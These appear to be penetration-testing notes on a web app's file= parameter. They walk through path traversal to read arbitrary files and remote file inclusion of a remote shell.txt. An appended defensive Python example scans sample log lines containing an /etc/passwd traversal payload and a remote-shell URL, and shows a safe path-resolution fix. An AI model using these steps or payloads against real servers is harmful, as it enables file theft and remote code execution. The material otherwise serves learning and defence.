Intercept with Burp and send the checkout request to Decoder, since there is some encoding:
→ now forward the request to see what happens. Note that there doesn't appear to be any token in the request that would limit cross-site request forgery;
Upload a test file and look at the file= parameter, which is the first injection point:
If the file= parameter is not sanitised, an attacker could gain access to arbitrary files:
Use ../ to go up the file system tree. Try one at a time; we don't know how many levels we have to go up by.
Also, test for errors by using a filename that won't exist. Errors can be very useful:
→ in this warning, the full path we are after is at the end of the warning;
But if we get no error, we have to guess how many ../ we have to add to reach root:
Once we are in the root directory, all further ../ will be ignored, so use enough to guarantee that we will be in the root directory:
Setting file=google.com and seeing the Google page rendered shows this parameter is vulnerable to remote file inclusion:
Now edit the payload to include a shell on the target server, e.g. shell.txt; the shell.txt file should be located on a remote server:
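Added example (not from the original notes): the defender's side of the file= parameter above. It scans constructed access-log lines for the traversal (../, also URL-encoded) and remote-URL patterns the notes describe, and shows the server-side fix: resolve the requested name inside a base directory and refuse anything that escapes it. Log lines, IPs, file names and the example.invalid host are all made up.

```python
import os
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00] "GET /index.php?file=welcome.txt HTTP/1.1" 200',
    '10.0.0.7 - - [01/Jan/2024:10:00:01] "GET /index.php?file=../../../../etc/passwd HTTP/1.1" 200',
    '10.0.0.7 - - [01/Jan/2024:10:00:02] "GET /index.php?file=..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200',
    '10.0.0.9 - - [01/Jan/2024:10:00:03] "GET /index.php?file=http://example.invalid/shell.txt HTTP/1.1" 200',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def classify_file_param(value):
    """Return 'remote', 'traversal' or 'ok' for one file= value."""
    decoded = unquote(unquote(value))  # decode twice so %252F-style double encoding is caught too
    if re.match(r"^[a-z][a-z0-9+.-]*://", decoded, re.I):
        return "remote"  # a URL scheme in the value -> remote file inclusion attempt
    if ".." in decoded.replace("\\", "/").split("/"):
        return "traversal"  # any ../ path segment -> path traversal attempt
    return "ok"


def scan_log(lines):
    """Return (client_ip, file_value, verdict) for every request carrying a file= parameter."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        for value in params.get("file", []):
            hits.append((line.split()[0], value, classify_file_param(value)))
    return hits


def safe_resolve(base_dir, requested):
    """Server-side fix: serve only files that resolve inside base_dir; otherwise return None."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    # realpath collapses every ../ (extra ones above / are ignored, as the notes say),
    # so a prefix comparison catches an escape no matter how many ../ were supplied.
    if os.path.commonpath([base, target]) != base:
        return None
    return target
```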